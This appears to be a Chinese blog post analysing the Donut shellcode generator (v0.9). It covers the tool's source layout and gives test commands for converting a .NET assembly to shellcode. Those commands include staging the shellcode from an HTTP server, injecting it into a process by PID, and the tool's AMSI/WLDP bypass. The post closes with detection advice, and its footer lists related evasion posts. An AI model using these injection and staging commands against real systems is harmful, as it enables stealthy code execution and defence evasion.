Shellcode生成工具Donut测试分析

最新推荐文章于 2024-08-16 11:57:35 发布
最新推荐文章于 2024-08-16 11:57:35 发布
阅读量2.7k 收藏 9
点赞数

0x00 前言

Donut是一个shellcode生成工具,可以将.NET程序集转换为shellcode。这是对execute-assembly的进一步利用,隐蔽性更高,可扩展性更强。

结合byt3bl33d3r的SILENTTRINITY,将其转换为shellcode并进行注入,适用性更广。

本文将会对Donut进行测试,逐个分析Donut工程中的代码,总结这个工具的特点。

注:本文测试的版本使用的是Donut v0.9,新版本将会添加更多的功能,值得持续关注

Donut地址:

https://github.com/TheWover/donut

介绍Donut细节的文章:

https://thewover.github.io/Introducing-Donut/

https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/

https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/

0x01 简介

本文将要介绍以下内容:

· 相关技术介绍

· 源码结构

· 实际测试

· 利用分析

0x02 相关技术介绍

1.Assembly.Load

用于在当前进程中加载.NET程序集,无法注入其他进程。

.NET程序集的测试代码:

namespace ConsoleApplication1
{
    public class Program
    {
        public static void test()
        {
            System.Diagnostics.Process p = new System.Diagnostics.Process();
            p.StartInfo.FileName = "c:\\windows\\system32\\calc.exe";  
            p.Start();
        }
        static void Main(string[] args)
        {
            test();
        }   
    }
}

加载这个.NET程序集的时候会弹出计算器,用作验证功能。PHP大马

(1)Powershell实现Assembly.Load

 

$bytes = [System.IO.File]::ReadAllBytes("ConsoleApplication1.exe")
[Reflection.Assembly]::Load($bytes)
[ConsoleApplication1.Program]::test()

注:可参考之前的文章《利用Assembly Load & LoadFile绕过Applocker的分析总结》

(2)C#实现Assembly.Load

https://github.com/anthemtotheego/SharpCradle

代码实现了从远程服务器下载.NET程序集并通过Assembly.Load进行加载。

2.execute-assembly

从内存中加载.NET程序集,能够以dll的形式注入到其他进程中。

注:可参考之前的文章《从内存加载.NET程序集(execute-assembly)的利用分析》

整个过程在内存执行,不写入文件系统(此时注入dll需要使用Dll反射)。

Payload以dll形式存在,不会产生可疑的进程。

注:如果使用Loadlibrary加载dll,dll必须写入文件系统。

3.Donut

基于execute-assembly,以shellcode的形式实现从内存中加载.NET程序集。

优点是注入到其他进程时不再依赖于Dll反射,更隐蔽,更易于扩展。

更隐蔽是指注入其他进程时不会存在dll。

更易于扩展是指能够执行shellcode的方法都可以使用Donut,基于Donut的二次开发也很容易。

0x03 源码结构

针对0.9版本的文件

1、子项目

1.DemoCreateProcess

https://github.com/TheWover/donut/tree/master/DemoCreateProcess

c#程序,编译后生成文件ClassLibrary.dll,功能为将传入的两个参数作为启动进程。

可通过Donut将其转换成shellcode,用作测试Donut生成shellcode的功能是否有效。

2.DonutTest

https://github.com/TheWover/donut/tree/master/DonutTest

c#程序,编译后生成文件DonutTest.exe,用于向指定pid的进程注入shellcode。

实现细节:

数组中保存base64加密后的shellcode,解密后通过CreateRemoteThread注入到指定进程。

3.rundotnet.cpp

https://github.com/TheWover/donut/blob/master/DonutTest/rundotnet.cpp

c程序,编译后的文件为rundotnet.exe,用于读取指定文件并使用CLR从内存加载.NET程序集。

从内存加载.NET程序集使用的方法:

· 使用当前系统中最新版本的.Net

· 使用ICorRuntimeHost接口

· 使用Load_3(…)从内存中读取并加载.NET程序集的Main方法

4.ModuleMonitor

https://github.com/TheWover/donut/tree/master/ModuleMonitor

使用WMI事件Win32_ModuleLoadTrace来监视模块加载,如果发现CLR注入,将会标记。

WMI事件Win32_ModuleLoadTrace:

https://docs.microsoft.com/en-us/previous-versions/windows/desktop/krnlprov/win32-moduleloadtrace

程序中判断CLR注入的方法:

如果进程加载了CLR,但程序不是.NET程序集,则CLR已注入其中。

程序中判断进程加载CLR的方法:

进程是否加载了与CLR相关的dll(mscoree.dll,mscoreei.dll和mscorlib.dll),dll以"msco"开头。

这个工程一般是作防御检测用,用来检测系统是否产生了CLR注入事件,所以在启动后进程会一直执行,实时记录系统加载新模块的事件。

这个地方使用tasklist.exe也能实现类似的功能,命令如下:

tasklist /m msco*

能够获得哪些进程调用了以"msco"开头的dll。

5.ProcessManager

https://github.com/TheWover/donut/tree/master/ProcessManager

用于枚举当前计算机或远程计算机上的进程。

同tasklist.exe的功能类似,增加以下功能:

· 判断进程权限

· 判断进程位数(32位还是64位)

· 判断进程是否加载CLR

2、组件

1.https://github.com/TheWover/donut/blob/master/payload/payload.c

Donut的关键功能,实现以下操作:

(1)获得shellcode并解密

提供两种方式:

· 从payload.h读取shellcode和解密密钥

· 从HTTP服务器下载shellcode和解密密钥

(2)使用CLR从内存加载.NET程序集

· 调用ICLRMetaHost::GetRuntime方法获取ICLRRuntimeInfo指针

· 使用ICorRuntimeHost接口

· 尝试关闭AMSI和WLDP

· 使用Load_3(…)从内存中读取

注:

介绍关闭AMSI和WLDP的细节:

https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/

值得注意的地方:

通常情况下,使用ICorRuntimeHost接口时需要调用mscorlib.tlb

这里并没有使用mscorlib.tlb,是通过手动定义的方式实现。

更多细节可参考:

https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/

2.https://github.com/TheWover/donut/tree/master/payload/exe2h

用来将exe转换为shellcode并保存到数组中。

从payload.exe中的.text段中提取已编译的机器码(包括dll和解密密钥),将其作为数组保存到payload_exe_x64.h或payload_exe_x86.h。

3.https://github.com/TheWover/donut/blob/master/payload/payload_exe_x64.h

存储64位的机器码(包括dll和解密密钥)。

4.https://github.com/TheWover/donut/blob/master/payload/payload_exe_x86.h

存储32位的机器码(包括dll和解密密钥)。

5.https://github.com/TheWover/donut/blob/master/payload/inject.c

使用RtlCreateUserThread向指定进程注入shellcode。

可用作测试向指定进程注入shellcode的功能。

6.https://github.com/TheWover/donut/blob/master/payload/runsc.c

C/S架构,两个功能,可以发送和接收shellcode并执行。

用于测试payload.bin的功能。

7.https://github.com/TheWover/donut/blob/master/encrypt.c

对称加密的实现。

8.https://github.com/TheWover/donut/blob/master/hash.c

API Hashing,这里使用了Maru hash。

9.https://github.com/TheWover/donut/blob/master/donut.c

主程序,用于将.NET程序集转换成shellcode。奇热影视

0x04 实际测试

1、选择测试dll

这里使用子项目DemoCreateProcess

编译后生成文件ClassLibrary.dll

2、使用Donut生成shellcode

64位:

donut.exe -a 2 -f ClassLibrary.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe

32位:

donut.exe -a 1 -f ClassLibrary.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe

命令执行后生成文件payload.bin。

如果加了-u指定URL,会再生成一个随机名称的Module文件,实例如下:

donut.exe -a 2 -f ClassLibrary.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://192.168.1.1

生成文件payload.bin和YX63F37T。

将YX63F37T上传到http://192.168.1.1。

接下来通过注入shellcode的方式执行payload.bin,payload.bin会从http://192.168.1.1/YX63F37T下载实际的shellcode并执行。

3、查看进程信息

这里使用子项目ProcessManager。

列出进程后,Managed选项如果为True,代表该进程已经加载CLR。

ProcessManager支持对指定进程进行筛选,例如只查看notepad.exe的进行信息,命令如下:

ProcessManager.exe --name notepad

4、注入shellcode

假设目标进程为3306

(1)使用子项目DonutTest

将payload.bin作base64编码并保存在剪贴板,powershell命令如下:

$filename = "payload.bin"
[Convert]::ToBase64String([IO.File]::ReadAllBytes($filename)) | clip

替换DonutTest工程中对应的变量,编译成功后执行如下命令:

DonutTest.exe 3306

(2)使用RtlCreateUserThread

https://github.com/TheWover/donut/blob/master/payload/inject.c

命令如下:

inject.exe 3306 payload.bin

5、检测

列出加载了CLR但不是.NET程序集的进程,命令如下:

tasklist /m msco*

0x05 利用分析

Donut能够将.NET程序集转换为shellcode。

也就是说,使用C#开发的程序都能通过Donut转换成shellcode。

就目前的趋势来说,C#开源的工具越来越多,例如:

· https://github.com/GhostPack/SharpWMI

· https://github.com/checkymander/Sharp-WMIExec

· https://github.com/jnqpblc/SharpTask

在渗透测试中,C#将会逐步替代Powershell,Donut的利用也会是一个趋势。

Donut的利用思路:

1.将.NET程序集转换为shellcode,例如配合SILENTTRINITY使用 2.作为模块集成到其他工具中 3.扩展功能:支持类似meterpreter的migrate功能。

为了更为隐蔽,可以先使用ProcessManager列举已经加载CLR的进程,对其进行注入。

Donut的检测:

Donut需要使用CLR从内存中加载.NET程序集,可采取以下方法进行检测:

· 进程不是.NET程序集

· 进程加载了与CLR相关的dll(dll以"msco"开头)

注:

正常程序也有可能存在这个行为。

两种检测方法:

· 使用命令tasklist /m msco*

· 使用WMI事件Win32_ModuleLoadTrace来监视模块加载

对满足以上条件的进程重点监控。

0x06 小结

本文对Donut进行了测试分析,总结利用思路,给出防御建议。Donut值得深入研究,期待Donut的新版本。

systemino
关注
第18节 神级开源shellcode工具donut
imbyter师哥的博客
05-15 1125
Donut是一款shellcode生成器,可将C/C++、C#生成的PE文件转换为shellcode文件,同时支持JS、XSL、VBS脚本转换为shellcode。以下“原生”EXE/DLL指非托管PE文件(包括并不限于C/C++、delphie等编写生成的可执行文件),可以直接由系统加载运行,区别于.Net生成的托管文件。被处理exe/dll为32位程序,则需要用32为的shellcode加载器启用,exe/dll为64位的就用64位shellcode加载器启用。
donut:生成x86,x64或AMD64 + x86位置无关的shellcode,该shellcode从内存中加载.NET程序集,PE文件和其他Windows有效负载,并使用参数运行它们
04-29
当前版本: 请提交有关v1.0版本的问题和要求 目录 用甜甜圈开发 问题与讨论 免责声明 1.简介 Donut是与位置无关的代码,可在内存中执行VBScript,JScript,EXE,DLL文件和dotNET程序集。 Donut创建的模块既可以从HTTP服务器进行登台,也可以直接嵌入到加载程序本身中。 可以选择使用Chaskey块密码和128位随机生成的密钥对模块进行加密。 文件加载并在内存中执行后,原始引用将被删除以阻止内存扫描程序。 生成器和加载器支持以下功能: 使用aPLib和LZNT1,Xpress,Xpress Huffman通过RtlCompressBuffer压缩输入文件。 将熵用于API哈希和字符串生成。 文件的128位对称加密。 修补反恶意软件扫描接口(AMSI)和Windows锁定策略(WLDP)。 修补EXE文件的命令行。 修补与出口相关的API,以避
以色列实体遭 Donut 和 Sliver 框架利用攻击
smellycat000的专栏
07-04 303
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士网络安全研究员发现了攻击活动,专门通过公开可用的框架如 Donut 和 Sliver 攻击以色列多种实体。该攻击被指针对性很强。法国公司HarfangLab在上周发布的报告中提到,它“利用特定目标的基础设施和自定义 WordPress 作为 payload 交付机制,但影响不相关垂直行业的多种实体,并依赖于著名的开源恶意软件。”该公司正在追踪同一...
WEB渗透免杀篇-MSF+shellcode免杀
最新发布
qq_59468567的博客
08-16 431
目前过火绒,不过360,可组合一下 Vs新建c++控制台程序 右键属性-》将MFC的使用选为在静态库中使用MFC 生成c格式shellcode粘贴进remote inject.cpp。生成的py文件使用py2exe编译执行 生成的cs文件使用csc.exe编译执行 生成的cpp文件使用vc6.0编译,去掉预编译头编译执行。正常执行结束进程msbuild会失去会话,以下保存bat执行 获得session后立刻迁移进程。生成项目 能成功上线,并开启calc进程。当前过不了火绒,360动态静态可过。
使用 donut 将 exe 转成 shellcode
hambaga的博客
01-19 4770
donut可以将C语言编写的EXE 转成shellcode,免杀shellcode比免杀exe简单得多。 donut 可以在github上下载,下面直接给出命令,将一个32位EXE转成shellcode。 .\donut -f .\Sharphound.exe -a1 具体参数请看文档。执行该命令会得到一个payload.bin,是二进制shellcode,你可以写一个程序把它转成C语言的数组,在程序中调用就行了。 ...
Donut:将.NET程序集注入Windows进程
Coisini的博客
06-26 1238
Donut是一个shellcode生成工具,它可以从.NET程序集中创建与位置无关的shellcode payloads。此shellcode可用于将程序集注入任意Windows进程。给定一个任意.NET程序集,参数和入口点(如Program.Main),Donut就可为我们生成一个与位置无关的shellcode,并从内存加载它。.NET程序集可以通过直接嵌入shellcode从URL或Sta...
shellcode帮助工具,直接把exe转shellcode
12-29
Shellcode Helper v1.62 Coded by TeLeMan (c) 2008-2013 Usage: schelper.exe [options] Options: -i [input file] input file (Default: stdin) -o [output file] output file (Default: stdout) -s input file format (Default: Auto-Detection) -sb input file format is Binary -sp the input file format's parameters -d output file format (Default: C format) -db output file format is Binary -dp the output file format's parameters -search get the start offset by the pattern: e.g. PK\x03\x04 -soff fix the match offset after searching (Default: 0) -off convert the input file from the offset (Default: 0) -len convert the input file with the length (Default: 0 - MAX) -en [encoder] encode shellcode (Default: XorDword) -de [encoder] decode shellcode (Default: Auto-Detection) -ex exclude characters: e.g. 0x00,0x01-0x1F,0xFF (Default: 0x00) -in incude characters only -ep the encoder's parameters -t [pid] execute or inject shellcode into process for testing -td [pid] execute or inject shellcode into process for debugging -stack put shellcode into stack and execute it (ESP is the shellcode start) -noinfo display no normal messages except error messages Available formats: 0 - C 1 - C(HexArray) 2 - Perl 3 - Python 4 - Ruby 5 - JavaScript(Escape) 6 - VBScript(Escape) 7 - Pascal 8 - MASM(Data) 9 - HexDump 10 - BitString 11 - HexString 12 - HexArray(C like) 13 - Base64 14 - Binary 15 - HexString(C like) 16 - HexString(Escape) 17 - HexString(JavaScript,UNICODE) 18 - URI(ISO-8859-1) 19 - XML(PCDATA) 20 - BigNumber 21 - BigNumber(Hex) 22 - BigNumber(BaseX) 23 - FloatPoint 24 - UnixTimestamp 25 - GUID 26 - MASM(ASM) 27 - NASM 28 - YASM(ASM) 29 - FASM(ASM) 30 - JWASM(ASM) 31 - POASM(ASM) 32 - GOASM(ASM) 33 - GNU ASM Available encoders:
2022 年红队工具和模拟工具
m0_60571990的博客
11-30 1783
2022 年红队工具和模拟工具
asga:用于 ARM 目标的字母数字 Shellcode 生成
06-18
asga(用于 ARM 目标的字母数字 Shellcode 生成器) 基于 Rix 的“Writing ia32 alphanumeric shellcodes”、来自 BerendJanWever 的“Alpha3”的循环解码思想,以及 Yves Younan 等人的 Phrack 文章“Alphanumeric...
shellcode_generator:shellcode生成器,Visual Studio,C ++,Windows
03-09
Shellcode是一种特殊的低级代码,通常用于在计算机内存中执行...这不仅有助于安全研究人员测试系统漏洞,也是逆向工程和恶意软件分析的重要工具。然而,这些技术也应谨慎使用,以遵守法律法规和道德准则,防止滥用。
cpp-使用纯CC编写的ShellCode生成框架
08-16
总结,"cpp-使用纯CC编写的ShellCode生成框架"是为安全研究人员和逆向工程师提供的一个实用工具,它简化了ShellCode的创建过程,并提供了跨平台和多策略的支持。通过理解ShellCode的工作原理和如何利用框架,开发者...
donutCS:德姆锋利的甜甜圈
04-12
甜甜圈CS .NET Core版本的Doughnut Shellcode生成器。 注意:我只是将一堆东西粘合在一起,以提供更个人使用的版本。 TheWover和Odzhan做了所有的辛苦工作,那些帅哥是神职。 (严重的话,如果您看到了您了解的内部原理) 安装 确认可以在Linux,Mac和Windows上使用 用法 Nuget软件包(首选) 从nuget repo下载并添加: ://www.nuget.org/packages/DonutCore/查看用法 或者 我已将软件包添加到根目录。 (DonutCore.1.0.0.nupkg) 导入说明和暂时的简短视频可以在找到 现在,在\ bin \目录中编译该软件包时,也会自动生成该软件包。 普通的 有关完整用法,请参阅 。 应该完全一样。 基本用法可以在找到 如果您不想看到编组错误和调试打印,可以从donut目录的根目录运行dot
pe_to_shellcode_linux:PE到shellcode会将任何Windows非.dot net 64位EXE文件转换为shellcode。 这基于hasherezade的Windows pe_to_shellcode(https:github.comhasherezadepe_to_shellcode
02-13
pe_to_shellcode_linux PE到shellcode会将任何Windows非.dot net 64位EXE文件转换为shellcode。 这基于hasherezade的Windows pe_to_shellcode( )。 Hashrezade的HLDR64文件源 下载和构建: 在终端中,通过git下载源代码: git clone cd进入文件夹: cd pe_to_shellcode_linux 键入./build.sh 选项: -f指定要转换的exe文件 -o输出要使用的二进制shell文件 用法:pe2shellcode -f 64bitexe.exe -o shellcode.sc
shellcode转换工具
07-26
shellcode转换工具
远程命令执行漏洞总结(Unix和Windows)
南迪叶先森
07-15 5804
一 前言 远程代码执行(RCE)使攻击者能够通过注入攻击执行恶意代码。代码注入攻击与命令注入攻击不同。攻击者的成果取决于服务器端的限制,在某些情况下,攻击者可能能够从代码注入升级为命令注入。远程代码攻击可能会完全破坏易受攻击的Web应用程序以及Web服务器。需要注意的是,几乎每种编程语言都有代码执行函数 二 Unix RCE 1 Top 46 RCE 参数 exec={payload} payload={payload} command={payload} run={paylo
第16节 实战:文件转shellcode
imbyter师哥的博客
05-14 1660
我最近做了一个关于shellcode入门和开发的专题课👩🏻‍💻,主要面向对网络安全技术感兴趣的小伙伴。这是视频版内容对应的文字版材料,内容里面的每一个环境我都亲自测试实操过的记录,有需要的小伙伴可以参考。
恶意代码分析实战 16 Shellcode分析
农夫果园好好喝的博客
01-25 1510
切换回来,208处pop指令会将栈顶也就是224这个地址赋给esi,之后push则是将其压栈,mov指令将esi赋给edi,lodsb指令在这里是将esi赋给eax,esi中的地址是224,该地址的值是多少呢?可以看到该地址的值是49h,也就是将49h赋给eax,之后al赋给dl,dl此时的值就是49h,dl减去41h,所得结果左移4位,然后esi自增,变成了225,同样定位225,按d键,结果如下。这个shellcode使用了一种字母编码的方式,攻击负载的一个字节存储在两个编码字节的低4比特位。
远控免杀从入门到实践 (11) 终结篇
weixin_46236101的博客
03-13 4445
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《远控免杀从入门到实践》系列文章目录: 1、远控免杀从入门到实践 (1)基础篇 2、远控免杀从入门到实践 (2)工具总结篇 3、远控免杀从入门到实践 (3)代码篇-C/C++ 4、远控免杀从入门到实践 (4)代码篇-C# 5、远控免杀从入门到实践 (5)代码篇-Python 6、远控免杀从入门到实践 (6)代码篇-Powershell 7、远控免杀从入门到实践
高级语言程序转换SHELLCODE时编码注意
冷风
03-23 4562
使用VC写的DLL通过内存加载类,转成SHELLCODE,发现一个诡异的问题,程序直接运行操作与下载无任何问题,下载10G数据也不会出错。但转成SHELLCODE后,诡异的问题,就出现了,不确定时间地点,出错。经过3个多小时,每句代码排查,找出问题原因,使用了如下代码:UINT ProcFileEnumWillDown(TCHAR * str_path)//枚举要下载的文件夹 { CListDi
shellcode生成
04-11
b'shellcode生成器'是用于生成恶意代码的软件。它通常被黑客用于攻击受害者的计算机系统,执行各种恶意活动,如窃取敏感信息、控制系统、启动勒索软件等。该生成器可以创建针对不同操作系统和处理器架构的shellcode,通常用于利用计算机系统中的漏洞。因此,b'shellcode生成器'是一种非常危险的工具,应该被严格控制和限制。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值